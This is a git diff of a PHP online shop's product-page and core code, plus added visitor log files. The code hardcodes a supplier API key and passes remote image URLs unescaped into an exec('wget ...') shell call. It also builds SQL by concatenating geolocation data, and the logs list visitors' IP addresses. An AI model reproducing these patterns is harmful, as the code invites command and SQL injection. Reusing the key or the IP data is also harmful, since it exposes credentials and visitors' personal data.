$insert_id = \DB::add( "INSERT INTO `docs` (`t`, `tip`, `json`, `user_id`, `status`, `comment`) VALUES('" . time() . "', 'pereocenka', ?, ?, 1, 'Документ создан из публичной карточки товара')", array($json, $_SESSION['user_id']) );
if ($insert_id) \DB::add( "INSERT INTO `tovar_price_history` (`t`, `tovar_id`, `status`, `cena`, `docs_id`) VALUES(?, ?, ?, ?, ?)", array( time(), $_GET['id'], '1', $partner_cena, $insert_id ) );
}
}
*/
//if ( $page[0]['partner']=='samson'){ //Берем цену с сайта партнера //if ( $page[0]['partner']=='samson'){ //Берем цену с сайта партнера
$curl = curl_init('https://api.samsonopt.ru/v1/sku/' . $page[0]['code'] . '/?api_key=4e2ef85d3ec9e27cc2a148c74a47d804'); $curl = curl_init('https://api.samsonopt.ru/v1/sku/' . $page[0]['code'] . '/?api_key=4e2ef85d3ec9e27cc2a148c74a47d804');
$arHeaderList = array(); $arHeaderList = array();
@ -140,7 +110,7 @@ $countImg=count($imagesTovar);
Получаем характеристики из БД Получаем характеристики из БД
---------------------------------------------------------------------- */ ---------------------------------------------------------------------- */
$har = \DB::getAll( "SELECT * FROM `tovar_har` WHERE `tovar_id`=?", $_GET['id'] ); $har = \DB::getAll( "SELECT * FROM `tovar_har` WHERE `tovar_id`=?", $_GET['id'] );
for ( $i=0; $i < count( $har ); $i++ ) $har[$i]['opt']=\DB::getValue("SELECT `txt` FROM `sp_har` WHERE `id`=?", $har[$i]['tovar_har_sp_id']); for ( $i=0; $i < count( $har ); $i++ ) $har[$i]['opt']=\DB::getValue("SELECT `txt` FROM `tovar_har_sp` WHERE `id`=?", $har[$i]['tovar_har_sp_id']);
$smarty -> assign( 'har', $har ); $smarty -> assign( 'har', $har );
/* ---------------------------------------------------------------------- /* ----------------------------------------------------------------------
@ -156,10 +126,18 @@ if (!$id) \DB::add( "INSERT INTO `tovar_history` (`tovar_id`, `session_id`, `t`)
/* ---------------------------------------------------------------------- /* ----------------------------------------------------------------------
28.12.2022 05.02.2023
Получаем теги ищем похожие товары - этой же категории, но рандомно
---------------------------------------------------------------------- */ ---------------------------------------------------------------------- */
$rndTovar=\DB::getAll("SELECT * FROM `tovar` WHERE `category`=? ORDER BY RAND() LIMIT 10", $page[0]['category']);
//print_r($rndTovar);
for ($i=0; $i<count($rndTovar); $i++){
$rndTovar[$i]['cena']=\DB::getValue('SELECT `cena` FROM `tovar_price_history` WHERE `status`=1 AND `tovar_id`=? ORDER BY `id` DESC LIMIT 1', $rndTovar[$i]['id']);
$rndTovar[$i]['img']=\DB::getValue('SELECT `filename` FROM `tovar_img` WHERE `tovar_id`=? LIMIT 1', $rndTovar[$i]['id']);
}
$smarty -> assign( 'rndTovar', $rndTovar );
//$smarty->assign('keywords', \core::getMeta( $_GET['mod'], $_GET['id'], 'keywords') ); //$smarty->assign('keywords', \core::getMeta( $_GET['mod'], $_GET['id'], 'keywords') );
//$smarty->assign('description', \core::getMeta( $_GET['mod'], $_GET['id'], 'description') ); //$smarty->assign('description', \core::getMeta( $_GET['mod'], $_GET['id'], 'description') );

View File

@ -1,6 +1,52 @@
<?php <?php
function getFromSamson($code){
// echo $code;
$curl = curl_init('https://api.samsonopt.ru/v1/sku/' . $code . '/?api_key=4e2ef85d3ec9e27cc2a148c74a47d804');
// echo 'https://api.samsonopt.ru/v1/sku/' . $code . '/?api_key=4e2ef85d3ec9e27cc2a148c74a47d804';
$arHeaderList = array();
$arHeaderList[] = 'Accept: application/json';
$arHeaderList[] = 'User-Agent: 4e2ef85d3ec9e27cc2a148c74a47d804';
$arHeaderList[] = 'Accept-Encoding: gzip';
curl_setopt($curl, CURLOPT_HTTPHEADER, $arHeaderList);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_ENCODING, 'gzip');
$result = curl_exec($curl);
curl_close($curl);
return \json::from_j($result);
}
//Если нет картинок...
if ($page[0]['partner']=='samson' && !$imagesTovar){
$result=getFromSamson($page[0]['code']);
$listImg=$result['data'][0]['photo_list'];
//print_r ($listImg);
for ($i=0; $i<count($listImg); $i++){
$filename=\core::genpassword(30);
exec("wget " . $listImg[$i] . " -O /home/cloud/core/img/tk-ligat.ru/tovar/" . $filename . ".jpg");
DB::add("INSERT INTO `tovar_img` (`filename`, `tovar_id`) VALUES (?, ?)", array( $filename, $_GET['id'] ) );
}
}
if ($page[0]['partner']=='samson' && !$har){
$result=getFromSamson($page[0]['code']);
$listHar=$result['data'][0]['facet_list'];
for ($i=0; $i<count($listHar); $i++){
$h = $listHar[$i];
//проверяем, есть ли значение характеристики в БД, если нет - добавляем, если есть, добавляем ИД и характеристику
$har_sp_id=\DB::getValue("SELECT `id` FROM `tovar_har_sp` WHERE `txt`=?", $h['name']);
if (!$har_sp_id)$har_sp_id=\DB::add("INSERT INTO `tovar_har_sp` (`txt`) VALUES(?)", $h['name']);
\DB::add("INSERT INTO `tovar_har` (`tovar_har_sp_id`, `tovar_id`, `txt`) VALUES(?, ?, ?)", array($har_sp_id, $_GET['id'], $h['value']));
}
}
//print_r(getFromSamson($page[0]['code']));
//Если нет картинок..... Ищем в хрен знает где.... //Если нет картинок..... Ищем в хрен знает где....
/* /*
if (!$imagesTovar){ if (!$imagesTovar){
@ -15,10 +61,10 @@ if (!$imagesTovar){
//Проверяем наличие картинок в папке.... //Проверяем наличие картинок в папке....
/*
$checkImg=\DB::getAll("SELECT * FROM `tovar_img` WHERE `tovar_id`=?", $_GET['id']); $checkImg=\DB::getAll("SELECT * FROM `tovar_img` WHERE `tovar_id`=?", $_GET['id']);
for ($i=0; $i<count($checkImg); $i++) for ($i=0; $i<count($checkImg); $i++)
if ( !file_exists ( 'img/' . $_SERVER['SERVER_NAME'] . '/tovar/' . $checkImg[$i]['filename'] . '.jpg' ) ) \DB::set("DELETE FROM `tovar_img` WHERE `filename`=? AND `tovar_id`=?", array( $checkImg[$i]['filename'], $_GET['id'] ) ); if ( !file_exists ( 'img/' . $_SERVER['SERVER_NAME'] . '/tovar/' . $checkImg[$i]['filename'] . '.jpg' ) ) \DB::set("DELETE FROM `tovar_img` WHERE `filename`=? AND `tovar_id`=?", array( $checkImg[$i]['filename'], $_GET['id'] ) );
if (count($checkImg)==0) exec("php /home/cloud/core/parcer/getj.php " . $page[0]['code'] . " &"); if (count($checkImg)==0) exec("php /home/cloud/core/parcer/getj.php " . $page[0]['code'] . " &");*/
?> ?>

View File

@ -19,11 +19,11 @@ class core{
$res=self::get_geo_api($_SERVER['REMOTE_ADDR']); $res=self::get_geo_api($_SERVER['REMOTE_ADDR']);
$strana_id = \DB::getValue('SELECT `id` FROM `strana` WHERE `txt` = "' . $res['country'] . '"'); $strana_id = \DB::getValue('SELECT `id` FROM `strana` WHERE `txt` = "' . $res['country'] . '"');
if (!$strana_id && $res['country'])$strana_id=\DB::add("INSERT INTO `strana` (`txt`) VALUES (?)", array($res['country'])); if (!$strana_id && $res['country'])$strana_id=\DB::add("INSERT INTO `strana` (`txt`) VALUES (?)", array($res['country']));
$region_id = \DB::getValue('SELECT `id` FROM `region` WHERE `region` = "' . $res['regionName'] . '" AND `strana_id` = ' . $strana_id); $region_id = \DB::getValue('SELECT `id` FROM `region` WHERE `txt` = "' . $res['regionName'] . '" AND `strana_id` = ' . $strana_id);
if ( !$region_id && $res['regionName'] )$region_id = \DB::add("INSERT INTO `region` (`region`, `strana_id`) VALUES (?, ?)", array($res['regionName'], $strana_id)); if ( !$region_id && $res['regionName'] )$region_id = \DB::add("INSERT INTO `region` (`txt`, `strana_id`) VALUES (?, ?)", array($res['regionName'], $strana_id));
$city_id = \DB::getValue('SELECT `id` FROM `city` WHERE `city` = "' . $res['city'] . '" AND `strana_id` = ' . $strana_id . ' AND `region_id`=' . $region_id); $city_id = \DB::getValue('SELECT `id` FROM `city` WHERE `txt` = "' . $res['city'] . '" AND `strana_id` = ' . $strana_id . ' AND `region_id`=' . $region_id);
if (!$city_id && $res['city'] ){ if (!$city_id && $res['city'] ){
$city_id = \DB::add("INSERT INTO `city` (`city`, `strana_id`, `region_id`) VALUES (?, ?, ?)" , array( $res['city'], $strana_id, $region_id) ); $city_id = \DB::add("INSERT INTO `city` (`txt`, `strana_id`, `region_id`) VALUES (?, ?, ?)" , array( $res['city'], $strana_id, $region_id) );
$_SESSION['city']=$city_id; $_SESSION['city']=$city_id;
} }
} }
@ -200,6 +200,16 @@ static function getBreadcrumb ( $table, $category) {
return array_reverse ( $res ); return array_reverse ( $res );
} }
/* ----------------------------------------------------------------------
02.02.2023
Архиватор и разорхиватор
---------------------------------------------------------------------- */
static function zip ( $txt) {
return base64_encode(gzcompress ( $txt, 9));
}
static function unzip ( $txt) {
return gzuncompress ( base64_decode ( $txt ) );
}

View File

@ -28,7 +28,7 @@ class DB
*/ */
public static function getDbh(){ public static function getDbh(){
require 'set/' . $_SERVER['SERVER_NAME'] . '.php'; require '/home/cloud/core/set/' . $_SERVER['SERVER_NAME'] . '.php';
if (self::$type==''){ if (self::$type==''){
if (@$db['type']=='mysql'){ if (@$db['type']=='mysql'){
if (!self::$dsn){ if (!self::$dsn){

View File

@ -0,0 +1,5 @@
79.173.90.50;1675222464;Chrome 10+;Windows;https://tk-ligat.ru/;
46.165.16.184;1675263135;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/21923;
46.165.16.184;1675263674;Firefox 10+;Linux;https://tk-ligat.ru/;
46.165.16.184;1675263705;Firefox 10+;Linux;https://tk-ligat.ru/lk/;
46.165.16.184;1675263713;Firefox 10+;Linux;https://tk-ligat.ru/lk/;
1 79.173.90.50 1675222464 Chrome 10+ Windows https://tk-ligat.ru/
2 46.165.16.184 1675263135 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/21923
3 46.165.16.184 1675263674 Firefox 10+ Linux https://tk-ligat.ru/
4 46.165.16.184 1675263705 Firefox 10+ Linux https://tk-ligat.ru/lk/
5 46.165.16.184 1675263713 Firefox 10+ Linux https://tk-ligat.ru/lk/

View File

@ -0,0 +1,58 @@
5.255.228.213;1675293625; ;Неизвестна;https://tk-ligat.ru/;
82.195.16.173;1675313378;Chrome 10+;Windows;https://tk-ligat.ru/;
82.195.16.173;1675313635;Chrome 10+;Windows;https://tk-ligat.ru/;
82.195.16.173;1675313641;Chrome 10+;Windows;https://tk-ligat.ru/;
82.195.16.173;1675314425;Chrome 10+;Windows;https://tk-ligat.ru/;
82.195.16.173;1675314429;Chrome 10+;Windows;https://tk-ligat.ru/;
82.195.16.173;1675314449;Chrome 10+;Windows;https://tk-ligat.ru/;
46.165.16.184;1675346264;Firefox 10+;Linux;https://tk-ligat.ru/;
46.165.16.184;1675346266;Firefox 10+;Linux;https://tk-ligat.ru/;
46.165.16.184;1675346276;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/16629;
46.165.16.184;1675346924;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/25-0.html;
46.165.16.184;1675346929;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/25-0.html;
46.165.16.184;1675346934;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/25-2.html;
46.165.16.184;1675346969;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/25-1.html;
46.165.16.184;1675346981;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/105-1.html;
46.165.16.184;1675346999;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/8-1.html;
46.165.16.184;1675347016;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/93-1.html;
46.165.16.184;1675347025;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/113-1.html;
46.165.16.184;1675347054;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/113-2.html;
46.165.16.184;1675347065;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/17-1.html;
46.165.16.184;1675347078;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/74-1.html;
46.165.16.184;1675347135;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/74-2.html;
46.165.16.184;1675347189;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/74-3.html;
46.165.16.184;1675347238;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/78-1.html;
46.165.16.184;1675347465;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/49-1.html;
46.165.16.184;1675347509;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/18-1.html;
46.165.16.184;1675347566;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/18-2.html;
46.165.16.184;1675347600;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/18-3.html;
46.165.16.184;1675347636;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/18-4.html;
46.165.16.184;1675347693;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/18-5.html;
46.165.16.184;1675347708;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/65-1.html;
46.165.16.184;1675347745;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/48-1.html;
46.165.16.184;1675347770;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/112-1.html;
46.165.16.184;1675347792;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/76-1.html;
46.165.16.184;1675347825;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/76-2.html;
46.165.16.184;1675347839;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/100-1.html;
46.165.16.184;1675347843;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/102-1.html;
46.165.16.184;1675347847;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/101-1.html;
46.165.16.184;1675347876;Firefox 10+;Linux;https://tk-ligat.ru/;
46.165.16.184;1675350410;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/27553;
46.165.16.184;1675350908;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/28701;
46.165.16.184;1675351041;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675351053;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-20.html;
46.165.16.184;1675351225;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-20.html;
46.165.16.184;1675351242;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-64.html;
46.165.16.184;1675351269;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-13.html;
46.165.16.184;1675351479;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/28992;
46.165.16.184;1675351530;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-25.html;
46.165.16.184;1675351623;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-27.html;
46.165.16.184;1675351665;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-349.html;
46.165.16.184;1675352624;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675353035;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-50.html;
46.165.16.184;1675353066;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/6-50.html;
46.165.16.184;1675353079;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-50.html;
46.165.16.184;1675353100;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-57.html;
46.165.16.184;1675353417;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/30606;
46.165.16.184;1675355232;Chrome 10+;Linux;https://tk-ligat.ru/tovar_cat/3-1.html;
46.165.16.184;1675355277;Chrome 10+;Linux;https://tk-ligat.ru/tovar_cat/3-1.html;
1 5.255.228.213 1675293625 Неизвестна https://tk-ligat.ru/
2 82.195.16.173 1675313378 Chrome 10+ Windows https://tk-ligat.ru/
3 82.195.16.173 1675313635 Chrome 10+ Windows https://tk-ligat.ru/
4 82.195.16.173 1675313641 Chrome 10+ Windows https://tk-ligat.ru/
5 82.195.16.173 1675314425 Chrome 10+ Windows https://tk-ligat.ru/
6 82.195.16.173 1675314429 Chrome 10+ Windows https://tk-ligat.ru/
7 82.195.16.173 1675314449 Chrome 10+ Windows https://tk-ligat.ru/
8 46.165.16.184 1675346264 Firefox 10+ Linux https://tk-ligat.ru/
9 46.165.16.184 1675346266 Firefox 10+ Linux https://tk-ligat.ru/
10 46.165.16.184 1675346276 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/16629
11 46.165.16.184 1675346924 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/25-0.html
12 46.165.16.184 1675346929 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/25-0.html
13 46.165.16.184 1675346934 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/25-2.html
14 46.165.16.184 1675346969 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/25-1.html
15 46.165.16.184 1675346981 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/105-1.html
16 46.165.16.184 1675346999 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/8-1.html
17 46.165.16.184 1675347016 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/93-1.html
18 46.165.16.184 1675347025 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/113-1.html
19 46.165.16.184 1675347054 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/113-2.html
20 46.165.16.184 1675347065 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/17-1.html
21 46.165.16.184 1675347078 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/74-1.html
22 46.165.16.184 1675347135 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/74-2.html
23 46.165.16.184 1675347189 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/74-3.html
24 46.165.16.184 1675347238 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/78-1.html
25 46.165.16.184 1675347465 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/49-1.html
26 46.165.16.184 1675347509 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/18-1.html
27 46.165.16.184 1675347566 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/18-2.html
28 46.165.16.184 1675347600 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/18-3.html
29 46.165.16.184 1675347636 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/18-4.html
30 46.165.16.184 1675347693 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/18-5.html
31 46.165.16.184 1675347708 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/65-1.html
32 46.165.16.184 1675347745 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/48-1.html
33 46.165.16.184 1675347770 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/112-1.html
34 46.165.16.184 1675347792 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/76-1.html
35 46.165.16.184 1675347825 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/76-2.html
36 46.165.16.184 1675347839 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/100-1.html
37 46.165.16.184 1675347843 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/102-1.html
38 46.165.16.184 1675347847 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/101-1.html
39 46.165.16.184 1675347876 Firefox 10+ Linux https://tk-ligat.ru/
40 46.165.16.184 1675350410 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/27553
41 46.165.16.184 1675350908 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/28701
42 46.165.16.184 1675351041 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
43 46.165.16.184 1675351053 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-20.html
44 46.165.16.184 1675351225 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-20.html
45 46.165.16.184 1675351242 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-64.html
46 46.165.16.184 1675351269 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-13.html
47 46.165.16.184 1675351479 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/28992
48 46.165.16.184 1675351530 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-25.html
49 46.165.16.184 1675351623 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-27.html
50 46.165.16.184 1675351665 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-349.html
51 46.165.16.184 1675352624 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
52 46.165.16.184 1675353035 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-50.html
53 46.165.16.184 1675353066 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/6-50.html
54 46.165.16.184 1675353079 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-50.html
55 46.165.16.184 1675353100 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-57.html
56 46.165.16.184 1675353417 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/30606
57 46.165.16.184 1675355232 Chrome 10+ Linux https://tk-ligat.ru/tovar_cat/3-1.html
58 46.165.16.184 1675355277 Chrome 10+ Linux https://tk-ligat.ru/tovar_cat/3-1.html

View File

@ -0,0 +1,11 @@
46.165.49.31;1675399315;Firefox 10+;Windows;https://tk-ligat.ru/;
46.165.49.31;1675399331;Firefox 10+;Windows;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.49.31;1675399418;Firefox 10+;Windows;https://tk-ligat.ru/tovar_cat/0-2.html;
46.165.49.31;1675399466;Firefox 10+;Windows;https://tk-ligat.ru/tovar_cat/0-3.html;
46.165.49.31;1675399556;Firefox 10+;Windows;https://tk-ligat.ru/;
46.165.49.31;1675399563;Firefox 10+;Windows;https://tk-ligat.ru/tovar_cat/0-4.html;
46.165.49.31;1675400447;Firefox 10+;Windows;https://tk-ligat.ru/tovar_cat/0-465.html;
46.165.16.184;1675434397;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/30606;
46.165.16.184;1675441840;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/30606;
46.165.16.184;1675441874;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675447446;Chrome 10+;Linux;https://tk-ligat.ru/tovar_cat/2-1.html;
1 46.165.49.31 1675399315 Firefox 10+ Windows https://tk-ligat.ru/
2 46.165.49.31 1675399331 Firefox 10+ Windows https://tk-ligat.ru/tovar_cat/0-1.html
3 46.165.49.31 1675399418 Firefox 10+ Windows https://tk-ligat.ru/tovar_cat/0-2.html
4 46.165.49.31 1675399466 Firefox 10+ Windows https://tk-ligat.ru/tovar_cat/0-3.html
5 46.165.49.31 1675399556 Firefox 10+ Windows https://tk-ligat.ru/
6 46.165.49.31 1675399563 Firefox 10+ Windows https://tk-ligat.ru/tovar_cat/0-4.html
7 46.165.49.31 1675400447 Firefox 10+ Windows https://tk-ligat.ru/tovar_cat/0-465.html
8 46.165.16.184 1675434397 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/30606
9 46.165.16.184 1675441840 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/30606
10 46.165.16.184 1675441874 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
11 46.165.16.184 1675447446 Chrome 10+ Linux https://tk-ligat.ru/tovar_cat/2-1.html

View File

@ -0,0 +1,246 @@
46.242.67.148;1675475775;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675504783;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/6-1.html;
46.165.16.184;1675505140;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/5-1.html;
46.165.16.184;1675505162;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/50-1.html;
46.165.16.184;1675505223;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/72-1.html;
46.165.16.184;1675505249;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675505295;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675505311;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/5-1.html;
46.165.16.184;1675505364;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/30392;
46.165.16.184;1675505445;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675505465;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675505543;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675505586;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675505613;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675505645;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-2.html;
46.165.16.184;1675505680;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/61-1.html;
46.165.16.184;1675505699;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/29452;
46.165.16.184;1675505744;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/61-1.html;
46.165.16.184;1675505769;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/61-1.html;
46.165.16.184;1675505818;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-2.html;
46.165.16.184;1675505869;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-3.html;
46.165.16.184;1675505918;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-4.html;
46.165.16.184;1675506073;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/31102;
46.165.16.184;1675506114;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-4.html;
46.165.16.184;1675506129;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675506144;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/13-1.html;
46.165.16.184;1675506164;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/30289;
46.165.16.184;1675506280;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-4.html;
46.165.16.184;1675506285;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/30289;
46.165.16.184;1675506297;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/13-1.html;
46.165.16.184;1675506308;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/119-1.html;
46.165.16.184;1675506320;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/120-1.html;
46.165.16.184;1675506341;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-5.html;
46.165.16.184;1675506545;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675506559;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/35-1.html;
46.165.16.184;1675506609;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/12603;
46.165.16.184;1675506668;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/35-1.html;
46.165.16.184;1675506682;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/121-1.html;
46.165.16.184;1675506708;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-5.html;
46.165.16.184;1675506775;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/30923;
46.165.16.184;1675506808;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/35-1.html;
46.165.16.184;1675506822;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/122-1.html;
46.165.16.184;1675506882;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/122-1.html;
46.165.16.184;1675506896;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/122-1.html;
46.165.16.184;1675506933;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-6.html;
46.165.16.184;1675506991;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/30920;
46.165.16.184;1675507047;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/122-1.html;
46.165.16.184;1675507060;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/122-1.html;
46.165.16.184;1675507081;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-7.html;
46.165.16.184;1675507105;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675507114;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/1-1.html;
46.165.16.184;1675507121;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/96-1.html;
46.165.16.184;1675507140;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/24947;
46.165.16.184;1675507177;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/96-1.html;
46.165.16.184;1675507189;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/96-1.html;
46.165.16.184;1675507213;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/96-2.html;
46.165.16.184;1675507231;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/96-1.html;
46.165.16.184;1675507272;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675507286;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/12-1.html;
46.165.16.184;1675507354;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/12-1.html;
46.165.16.184;1675507365;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/123-1.html;
46.165.16.184;1675507384;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-7.html;
46.165.16.184;1675507417;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-8.html;
